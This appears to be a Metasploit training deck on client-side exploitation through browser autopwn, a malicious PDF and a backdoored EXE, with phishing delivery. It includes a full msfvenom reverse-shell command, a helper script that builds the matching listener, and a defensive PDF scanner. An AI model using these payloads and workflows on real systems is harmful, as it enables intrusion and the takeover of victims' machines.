Metasploit is a vulnerability and exploitation framework used by security professionals to ease the burden of performing security assessments. It contains modules divided into exploits, auxiliary, payloads, and post-exploitation that provide penetration testing functionality. The techniques demonstrated in this deck include browser, PDF, and executable (client-side) exploitation, using Metasploit payloads to gain remote shells on target systems.
2. AGENDA
• Introduction to Metasploit
• History of Metasploit
• Exploit
• Payloads
• Auxiliary
• Network Reconnaissance with Metasploit
• Metasploit Payload
• Meterpreter and Post Exploitation
• Client-side Exploitation: Browser, PDF and EXE
• References
4. Introduction to Metasploit
• Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments.
• One of the single most useful auditing tools freely available to security professionals today.
• Contains an extensive library of "modules".
• Each module has a function, and they are divided up into "exploits", "auxiliary", "post" (post-exploitation), "payloads", "encoders", and "nops".
6. History
• Created by H. D. Moore in 2003 as a portable network tool written in Perl.
• In April 2004, with the help of spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads).
• By 2007, the Metasploit Framework had been completely rewritten in Ruby.
• On October 21, 2009, the project was acquired by Rapid7.
7. Exploits
• Vectors for penetrating the target systems.
• A software program that has been developed to attack an asset by taking advantage of a vulnerability.
• The objective of many exploits is to gain control over an asset.
8. Payloads
• A payload in Metasploit is the code that runs on the target once an exploit has succeeded; it is its own module type, not the exploit module itself.
• Each exploit can be paired with various payloads, such as reverse or bind shells or the Meterpreter shell, provided the payload fits the target platform and architecture.
• The exploit delivers and triggers the payload; the payload is what gives the attacker access.
9. Auxiliary
• The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more.
• Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.
10. Network Reconnaissance with Metasploit
• The foundation of any successful penetration test is solid reconnaissance.
• Gather enough information about the target before choosing an exploit.
• One example of reconnaissance is using the nmap tool for port scanning and identifying the services running on the target system; Metasploit's auxiliary scanner modules cover the same ground from inside msfconsole.
11. Metasploit Payloads
• There are mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
• Singles - Self-contained and completely standalone; can be something as simple as adding a user to the target system or running calc.exe.
• Stagers - Set up a network connection between the attacker and the victim, and are designed to be small and reliable.
• Stages - Payload components that are downloaded by Stager modules. Stages provide advanced features with no size limits, such as Meterpreter, VNC Injection, and the iPhone 'ipwn' shell.
• The name tells the two apart: a staged payload lists the stage and the stager as separate path elements (windows/shell/reverse_tcp), while a single fuses them with an underscore (windows/shell_reverse_tcp).
12. Meterpreter and Post Exploitation
• Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
• Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API.
• Post-exploitation is the work done after a successful exploit in order to keep control of the compromised system for later use.
• Post-exploitation includes setting up a backdoor to maintain more permanent system access and covering tracks.
13. Client-side Exploitation
• Client-side attacks require user interaction, such as enticing the user to click a link, open a document, or otherwise reach your malicious website.
• These attacks are often delivered using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents.
• The attack is often used in conjunction with social engineering techniques by way of phishing or spear phishing.
14. Browser Exploitation
• Browser exploitation means running a browser exploit in order to take advantage of a flaw in the browser, one of its plugins, or the underlying operating system, breaching browser security to run attacker-controlled code or alter the user's browser settings without their knowledge.
• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other web technologies and cause the browser to run arbitrary code.
15. To run this attack, open the Metasploit framework and use the browser_autopwn module.
16. Set LHOST to your IP address, SRVPORT to 80 (otherwise the link sent to the user has to be in the format IP:8080, the module's default port), and URIPATH to / so that Metasploit does not generate a random URL.
17. Now we can send the link by email to the client's employees. If any user opens the malicious link, the autopwn module tries each of its browser exploits against that browser. If the browser is vulnerable to any of them, a Meterpreter session opens.
18. PDF Exploitation
• Exploiting a system using an attacker-crafted PDF file.
• Mainly targets systems whose PDF reader is vulnerable to some sort of attack, such as a buffer overflow.
• The PDF is distributed to the victims by social engineering techniques.
• The PDF application sometimes fails to perform adequate boundary checks on user-supplied data, and the system can then be attacked using this technique.
19. We are going to use the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability (CVE-2008-2992; Metasploit module exploit/windows/fileformat/adobe_utilprintf).
20. Once we have all the options set the way we want, we run "exploit" to create our malicious file. We then use msfconsole to set up our multi/handler listener, with the same payload, LHOST and LPORT that were set when the file was generated.
21. Clicking the file opens Adobe Reader but shows a greyed-out window that never reveals a PDF. Instead, on the attacker's machine a Meterpreter session is opened, and thus we have a shell on the victim system.
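The check a defender would run against a file like the one produced above, as an added Python example that is not from the slides or from the Metasploit module. The sample PDFs are constructed inline and carry no shellcode: the util.printf() call with an oversized %f width stands in for the trigger, the SUSPICIOUS keyword list and the 1000-character width threshold are assumptions, and the FlateDecode and #XX-name handling exists so the two common ways of hiding the script from a naive grep are also caught.

```python
"""Flag PDFs that run JavaScript on open, the shape of the util.printf() exploit (added example)."""
import re
import zlib

# Constructed samples, not module output. JS_TRIGGER is only the call pattern
# reported for the util.printf() overflow (an oversized %f width); no shellcode.
JS_TRIGGER = b'util.printf("%45000f", 0)'

BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

MALICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Type /Action /S /JavaScript /JS (" + JS_TRIGGER + b") >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def compressed_variant():
    """Same trigger, with the JS moved into a FlateDecode stream so a plain
    keyword grep on the raw bytes would miss it."""
    body = zlib.compress(JS_TRIGGER)
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /Type /Action /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + body + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


# Assumed keyword list: names that make a PDF act without a click (OpenAction, AA),
# carry script (JS, JavaScript), or launch/embed something else.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile"]


def inflate_streams(data):
    """Append the inflated body of every FlateDecode stream to the scan buffer."""
    extra = []
    for m in re.finditer(rb"/FlateDecode.*?stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            extra.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # malformed stream: out of scope for a keyword triage
    return data + b"\n" + b"\n".join(extra)


def normalize_names(data):
    """Undo PDF name escaping (/J#53 -> /JS) so hex-escaped keywords are seen."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data):
    """Return the suspicious keywords found and whether JavaScript would run on open."""
    text = normalize_names(inflate_streams(data))
    findings = [k.decode() for k in SUSPICIOUS if re.search(re.escape(k) + rb"\b", text)]
    m = re.search(rb"util\.printf\s*\(\s*[\"']%(\d+)", text)
    if m and int(m.group(1)) > 1000:  # 1000 is an assumed threshold for "oversized"
        findings.append("util.printf width " + m.group(1).decode())
    auto_exec = ({"/OpenAction", "/AA"} & set(findings)) and ({"/JS", "/JavaScript"} & set(findings))
    return {"findings": findings, "auto_exec_js": bool(auto_exec)}


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PDF), ("malicious", MALICIOUS_PDF),
                         ("compressed", compressed_variant())):
        print(name, triage_pdf(sample))
```

The benign sample returns no findings; the malicious and compressed samples both report /OpenAction together with /JS, so the file would execute script the moment Adobe Reader opens it, which is exactly the behaviour described on slide 21. A real triage pipeline would hand such files to a full PDF parser rather than stop at this regex pass.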
22. EXE Exploitation
• Generate an executable from a Metasploit payload in order to target a victim with a malicious executable file.
• If you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.
• Generate a reverse shell payload, execute it on the remote system, and get our shell.
• The best way to do this is to backdoor a legitimate executable by embedding the malicious payload in it.
23. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
Use 'multi/handler', which is a stub that handles exploits launched outside of the framework; set its PAYLOAD, LHOST and LPORT to the same values that were given to msfvenom.
Run 'exploit' for the multi/handler and execute the generated executable on the victim.
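The consistency between the msfvenom command on slide 23 and the multi/handler listener, together with the staged/single naming from slide 11, as an added Python example (not from the slides or from Metasploit's own code). The parser only understands the `-p PAYLOAD KEY=VALUE -b BADCHARS` form used above; `payload_kind` is a name-based heuristic that assumes the stager transports listed in STAGER_NAMES; the generated resource script uses only `use`, `set` and `exploit -j`, which are real msfconsole commands. The input command is the one from the slide, embedded as a constant.

```python
"""Keep the msfvenom payload and the multi/handler listener in step (added example)."""
import re
import shlex

# Constructed input: the msfvenom command from slide 23, with the NUL bad char
# written as msfvenom expects it ("\x00").
EXAMPLE_CMD = (
    'msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp '
    'LHOST=192.168.1.101 LPORT=3333 -b "\\x00" -e x86/shikata_ga_nai '
    '-f exe -o /tmp/1.exe'
)

# Assumed list of stager transports that end the name of a staged payload; the
# framework has more, but these cover the shell/meterpreter stagers on the slides.
STAGER_NAMES = {"reverse_tcp", "bind_tcp", "reverse_http", "reverse_https"}


def parse_msfvenom(cmd):
    """Extract the payload name, KEY=VALUE datastore options and -b bad chars."""
    argv = shlex.split(cmd)
    if not argv or argv[0] != "msfvenom":
        raise ValueError("not an msfvenom command line")
    spec = {"payload": None, "opts": {}, "badchars": None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("-p", "--payload"):
            spec["payload"] = argv[i + 1]
            i += 2
        elif tok in ("-b", "--bad-chars"):
            spec["badchars"] = argv[i + 1]
            i += 2
        elif "=" in tok and not tok.startswith("-"):
            key, val = tok.split("=", 1)
            spec["opts"][key.upper()] = val  # datastore keys are case-insensitive
            i += 1
        else:
            i += 1  # -a, --platform, -e, -f, -o and their values: not needed here
    if spec["payload"] is None:
        raise ValueError("no -p/--payload given")
    return spec


def payload_kind(payload):
    """Name-based heuristic from slide 11: stage and stager as separate path
    elements (windows/shell/reverse_tcp) means staged; a fused name
    (windows/shell_reverse_tcp) or no transport at all (windows/adduser) means single."""
    parts = payload.split("/")
    return "staged" if len(parts) >= 3 and parts[-1] in STAGER_NAMES else "single"


def badchars_ok(badchars):
    """msfvenom reads -b as \\xNN escapes. A bare 'x00' (what survives a copy-paste
    that drops the backslash) is taken as the characters x, 0, 0, so the encoder
    never avoids the NUL byte at all."""
    if badchars is None:
        return True
    return re.fullmatch(r"(\\x[0-9a-fA-F]{2})+", badchars) is not None


def handler_rc(spec):
    """Resource script for exploit/multi/handler. PAYLOAD, LHOST and LPORT must
    equal what msfvenom baked into the executable: the handler for a staged
    payload is what serves the stage, so a windows/shell/reverse_tcp stager
    calling back to a handler set for windows/shell_reverse_tcp never yields a
    working session."""
    payload, opts = spec["payload"], spec["opts"]
    if "reverse" in payload:
        missing = [k for k in ("LHOST", "LPORT") if k not in opts]
        if missing:
            raise ValueError("reverse payload needs " + ", ".join(missing))
    lines = ["use exploit/multi/handler", f"set PAYLOAD {payload}"]
    for key in ("LHOST", "LPORT", "RHOST"):
        if key in opts:
            lines.append(f"set {key} {opts[key]}")
    lines.append("exploit -j")  # run as a background job so the console stays usable
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    spec = parse_msfvenom(EXAMPLE_CMD)
    print(f"# {spec['payload']} is a {payload_kind(spec['payload'])} payload; "
          f"bad chars {'ok' if badchars_ok(spec['badchars']) else 'MALFORMED'}")
    print(handler_rc(spec), end="")
```

Save the printed lines as handler.rc and start the listener with `msfconsole -r handler.rc`; the resource script is the shortest way to guarantee the handler was built from the same payload, LHOST and LPORT as the executable, which is the mismatch that most often explains a callback that never becomes a session.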
24. The generated executable can be distributed using some sort of social engineering attack; as soon as the executable is run on the victim system, it presents the attacker with a shell on the victim system.